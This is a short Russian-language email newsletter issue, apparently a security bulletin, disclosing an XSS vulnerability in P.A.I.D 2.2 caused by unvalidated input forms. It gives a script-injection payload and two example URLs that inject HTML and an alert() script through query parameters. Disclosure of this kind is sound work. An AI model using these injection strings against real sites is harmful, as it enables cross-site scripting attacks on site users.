Отправляет email-рассылки с помощью сервиса Sendsay
  Все выпуски  

Компьютер для продвинутых пользоватлей Выпус по безопасности. Ошибка в P.A.I.D.


Компьютер для продвинутых пользователей
В этом выпуске:
P.A.I.D
ПО: P.A.I.D
Версия: 2.2

Уязвимость:
Формы ввода находящиеся внутри My Account не проверяются. Для проведения XSS-атаки необходимо в поле ввода ввести: "><IMG SRC=javascript:alert('XSS')><".
Использование:
http://www.example.com/paid/faq.php?farea=2"><img%20src=lol.jpg><"
http://example.com/paid/index.php?read=<IMG%20SRC=javascript:alert('XSS')>
Не забудьте проголосовать за выпуск!
Рассылка создана и ведется при поддержке Информационной сети Пермского края.
Меня можно найти: ICQ - 273214003

e-mail - isdmi1::mail.ru

В избранное